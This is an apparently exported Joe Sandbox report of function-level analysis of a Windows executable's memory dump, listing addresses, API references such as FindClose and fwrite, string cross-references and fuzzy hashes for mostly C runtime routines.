Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: ErrorFileFindLastNext_errno
String ID:
API String ID: 2804278807-0
Opcode ID: 7cfe841b90e4922a52334382e8c7b15fe9c7ddb5546ac9d10c18a24a9ef10097
Instruction ID: 62c469d670b267ff73ad219ebe3d03042d15996f50bf7b38469f66676e2fc392
Opcode Fuzzy Hash: 7cfe841b90e4922a52334382e8c7b15fe9c7ddb5546ac9d10c18a24a9ef10097
Instruction Fuzzy Hash: 5601C8716046618BDF10EF69BC813A6B790EF45315F88846BE848CF346E23DC848D3E6

Uniqueness

Uniqueness Score: -1.00%

Function 00425290 Relevance: 4.5, APIs: 3, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindClose.KERNEL32(?,?,?,?,?,0042471B), ref: 004252A5
free.MSVCRT(?,?,?,?,?,?,0042471B), ref: 004252B4
_errno.MSVCRT ref: 004252C0

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: CloseFind_errnofree
String ID:
API String ID: 1660445202-0
Opcode ID: 441ba031dc975d3c37c690e2cc3b60cbc3454b32681044380269ab40b0034261
Instruction ID: 19311e590a9d18845a9dcd81fa132f71f2ec31319e629e5734ff85766be96cbc
Opcode Fuzzy Hash: 441ba031dc975d3c37c690e2cc3b60cbc3454b32681044380269ab40b0034261
Instruction Fuzzy Hash: 7DE04FB0700711CBC7007EB5A88522E36A4AF04314FD10AAEEC508F2C3E73C94404BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00426FE0 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5daf321b857766ad2d9d3cd1be15eb308d8f8412a232f7b019fe335b850ca8
Instruction ID: 455b9ab0fa881882b775e49478b9e31a878a35e2746c4bd75b0612878f9c125b
Opcode Fuzzy Hash: bd5daf321b857766ad2d9d3cd1be15eb308d8f8412a232f7b019fe335b850ca8
Instruction Fuzzy Hash: 9FF044B0A052068FCB1CCF04D4D0A26B7A0BFA8314F44689EDA840B382C339ECC0DBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0042D470 Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 0042D491

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: fwrite
String ID:
API String ID: 3559309478-0
Opcode ID: 33579abf34653b2a8d45757c3e979624fc9d68c6b05e62789373f5a915621bd8
Instruction ID: f7acf4bc98b963e248e062a7e8e0237117afa09915cde2f0d1228dd48b5207ab
Opcode Fuzzy Hash: 33579abf34653b2a8d45757c3e979624fc9d68c6b05e62789373f5a915621bd8
Instruction Fuzzy Hash: 12D06CB89083049FC340EF29D18561ABBE0BB98308F40899DE8C887302E339D9648F52

Uniqueness

Uniqueness Score: -1.00%

Function 004012F5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0040130A

Part of subcall function 004011A5: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,004012F5), ref: 004011E3
Part of subcall function 004011A5: _setmode.MSVCRT ref: 00401220
Part of subcall function 004011A5: _setmode.MSVCRT ref: 00401234
Part of subcall function 004011A5: _setmode.MSVCRT ref: 00401248
Part of subcall function 004011A5: __p__fmode.MSVCRT ref: 0040124D
Part of subcall function 004011A5: __p__environ.MSVCRT ref: 00401267
Part of subcall function 004011A5: _cexit.MSVCRT ref: 0040128A
Part of subcall function 004011A5: ExitProcess.KERNEL32 ref: 00401292

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode__set_app_type_cexit
String ID:
API String ID: 1603352833-0
Opcode ID: 0c6c21d3da0c26be2a6962d4b5d298f42c3039939e46e04a491074ec539d9ced
Instruction ID: b537ba7b3021bfc12492c367917d5c9f4a380c34972d173bc2a6d0b613c430d7
Opcode Fuzzy Hash: 0c6c21d3da0c26be2a6962d4b5d298f42c3039939e46e04a491074ec539d9ced
Instruction Fuzzy Hash: 6FD0CA32800A1A8BCA24AF78C80939AF7B0FB04308F020A1CE5A93B011C7B4351A8BE1

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 004012EA

Part of subcall function 004011A5: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,004012F5), ref: 004011E3
Part of subcall function 004011A5: _setmode.MSVCRT ref: 00401220
Part of subcall function 004011A5: _setmode.MSVCRT ref: 00401234
Part of subcall function 004011A5: _setmode.MSVCRT ref: 00401248
Part of subcall function 004011A5: __p__fmode.MSVCRT ref: 0040124D
Part of subcall function 004011A5: __p__environ.MSVCRT ref: 00401267
Part of subcall function 004011A5: _cexit.MSVCRT ref: 0040128A
Part of subcall function 004011A5: ExitProcess.KERNEL32 ref: 00401292

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode__set_app_type_cexit
String ID:
API String ID: 1603352833-0
Opcode ID: 81472174a9c8b944e2ceb1f4e4ab65e3830dc5efc5a6b5bc608e56136d046557
Instruction ID: 47275128fedc777255371a284aa1a686176105b773411750fa5747b567b606dc
Opcode Fuzzy Hash: 81472174a9c8b944e2ceb1f4e4ab65e3830dc5efc5a6b5bc608e56136d046557
Instruction Fuzzy Hash: F0A011B08080088AC3203F28C80A20A3AB0AB08300F08022CB0800A2A2CBB800888AAA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00420CD0 Relevance: 20.8, APIs: 7, Strings: 4, Instructions: 1598stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00420CDA
strlen.MSVCRT ref: 00420CE4

Strings

, xrefs: 0042208A
5, xrefs: 004212A2
!, xrefs: 0042287D
inity, xrefs: 00422402

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: e815c2ec56e0ae49ea9b27382123c498193bd113e543a7d261c9ba54a1ddde20
Instruction ID: 0e130e0ca7a6df97e55fec71d3ac585f0b09b3fd014ee4956513d286ccbd8a83
Opcode Fuzzy Hash: e815c2ec56e0ae49ea9b27382123c498193bd113e543a7d261c9ba54a1ddde20
Instruction Fuzzy Hash: 2CE248706083A1CFD320DF28D58476BBBE1BF94304F95892EE98987361D779E845CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00429800 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1446COMMON

Download Yara Rule

Strings

NaN, xrefs: 0042995C
9, xrefs: 0042AD32
, xrefs: 0042ADFA
Infinity, xrefs: 0042999C

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: $9$Infinity$NaN
API String ID: 0-197352145
Opcode ID: a97767642011b9083a543110e7c00f284885392681dbaeb82c0b28cddc6a66c5
Instruction ID: 7f280b3e9aab22591cad650cb8a7912bc243273c8cd7066bc69bb48167fede7e
Opcode Fuzzy Hash: a97767642011b9083a543110e7c00f284885392681dbaeb82c0b28cddc6a66c5
Instruction Fuzzy Hash: 44D244B1A083618FC310DF29D58421BBBE0BB88348F95492EE8D597361E379D955CF8B

Uniqueness

Uniqueness Score: -1.00%

Function 00425D40 Relevance: 6.7, APIs: 4, Instructions: 660COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00425D47

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: localeconv
String ID:
API String ID: 3737801528-0
Opcode ID: 3513e1a4d1d14dd198aa9093421a120db29fe829b197367fd2d0c621b92d26af
Instruction ID: b9284ff923231524a5b31e24bb7a83898ad3920c9f9cc8e63fc2ff371aa166f4
Opcode Fuzzy Hash: 3513e1a4d1d14dd198aa9093421a120db29fe829b197367fd2d0c621b92d26af
Instruction Fuzzy Hash: 6A42B0707083658BC710DF19E18432BBBE2BB84304F9A895EE8C59B341D779ED45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004428E0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 1067COMMON

Download Yara Rule

Strings

-, xrefs: 00442CD7
,5O, xrefs: 00442F7A

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: ,5O$-
API String ID: 0-3390524069
Opcode ID: a6ef09191976d58f788e0e984dc370556bfcf4485082072386103aa33dcf3b62
Instruction ID: d64095adc402f2a3a8903c16e53054d47469bf03f6c0dc6c2c0adb5885b4b9f8
Opcode Fuzzy Hash: a6ef09191976d58f788e0e984dc370556bfcf4485082072386103aa33dcf3b62
Instruction Fuzzy Hash: 37A2B270A043458FEB24CF28C184BAEBBB1BF05314F64865AE8559F392C379ED86CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00466420 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 851COMMON

Download Yara Rule

Strings

-, xrefs: 0046705F
,5O, xrefs: 004669CC

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: ,5O$-
API String ID: 0-3390524069
Opcode ID: c0729ad79b09cb5300bc5b1d97aac92e7e0c8980f83ff6cad9a0fec20fd54c76
Instruction ID: 074985e2108dc1a28e4c010391b6073b7b904a06021536cffeb6b3520c4b0e09
Opcode Fuzzy Hash: c0729ad79b09cb5300bc5b1d97aac92e7e0c8980f83ff6cad9a0fec20fd54c76
Instruction Fuzzy Hash: 8D729270A00249DFCF14CF68D484AAEBBB1BF45314F16825AE8559B391E339ED46CF86

Uniqueness

Uniqueness Score: -1.00%

Function 004656F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 851COMMON

Download Yara Rule

Strings

-, xrefs: 0046632F
,5O, xrefs: 00465C9C

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: ,5O$-
API String ID: 0-3390524069
Opcode ID: 4474d5e3b8fdd3834c59bd43f5218e4ba0ed73c1effa786c792f4cce2035ba2d
Instruction ID: c09b2f52bd865b9399cc263624875b1e108e8195d272374c5d136307ac582797
Opcode Fuzzy Hash: 4474d5e3b8fdd3834c59bd43f5218e4ba0ed73c1effa786c792f4cce2035ba2d
Instruction Fuzzy Hash: D8729070A046098FCF14DF68C494AAEBBF1BF05324F14865AE8659B391E339ED46CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0049C290 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

Part of subcall function 004A5D70: strlen.MSVCRT ref: 004A5D7E

wcslen.MSVCRT ref: 0049C316

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0049C2F4, 0049C36B, 0049C3E4, 0049C450, 0049C4C6, 0049C544, 0049C5B4
basic_string::replace, xrefs: 0049C2EC, 0049C363, 0049C3DC, 0049C448, 0049C4BE, 0049C53C, 0049C5AC

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlenwcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 803329031-3564965661
Opcode ID: 8d76fcbbe79e04df12ef0d1792caf12eb3b8dcb5cc60b9727927f73212c618ad
Instruction ID: e210c5b802886e3a502cd19d4d80c954fc4cd6eabc103d4d8e50bfba54443a73
Opcode Fuzzy Hash: 8d76fcbbe79e04df12ef0d1792caf12eb3b8dcb5cc60b9727927f73212c618ad
Instruction Fuzzy Hash: 64A13CB4A09714AF8740AF6D8A8441FFFE4FBC4750F94DA2EF98887355D274E8408B96

Uniqueness

Uniqueness Score: -1.00%

Function 00445DE0 Relevance: 4.8, Strings: 3, Instructions: 1017COMMON

Download Yara Rule

Strings

P1I, xrefs: 00446CF0
,5O, xrefs: 00446550
-, xrefs: 004461AE

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: ,5O$-$P1I
API String ID: 0-3531569498
Opcode ID: 78296e7f08b9d7948900ec2accdfffc41f5e05db4ffaaccafe32ed64d4cfdbf0
Instruction ID: 590d2b6b1dcef6242a48b160c10cc88154ea6bec31dbaeac368d21473ac75bea
Opcode Fuzzy Hash: 78296e7f08b9d7948900ec2accdfffc41f5e05db4ffaaccafe32ed64d4cfdbf0
Instruction Fuzzy Hash: 8D927170A042548BEF14DF68C0847AE7BB1BF06304F66855EE8499F392D779DC86CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00444DB0 Relevance: 4.8, Strings: 3, Instructions: 1016COMMON

Download Yara Rule

Strings

-, xrefs: 0044517E
,5O, xrefs: 00445520
`)I, xrefs: 00445CC0

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: ,5O$-$`)I
API String ID: 0-1947141267
Opcode ID: 16309b379162eceb056d7ebc5e0ec80dcdc1562288815787678290ca53f9cd1f
Instruction ID: 541796ffcf1940af7a7c8e462de31224affe13ae53df9f21e9a542590f8c256f
Opcode Fuzzy Hash: 16309b379162eceb056d7ebc5e0ec80dcdc1562288815787678290ca53f9cd1f
Instruction Fuzzy Hash: F1928B70A04648CBEF14DF68C0847AE7BB1BF45304F64855AE8499F392D779EC86CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004D87F0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78052c430ee59d04dec00af7362a8f02280950fb3f1323203a7ab47010caddbf
Instruction ID: 29e360af980b715b1eff284adf4c4df86812a61db507402c0eebb9906e4d50e1
Opcode Fuzzy Hash: 78052c430ee59d04dec00af7362a8f02280950fb3f1323203a7ab47010caddbf
Instruction Fuzzy Hash: 14F14DB1E012199FDF14CFA9C8906AEB7B1FF48314F15826FE419A7344DB35A901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041C8E0 Relevance: 3.4, APIs: 2, Instructions: 421COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,00000001,0041D9E4), ref: 0041C9E0

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
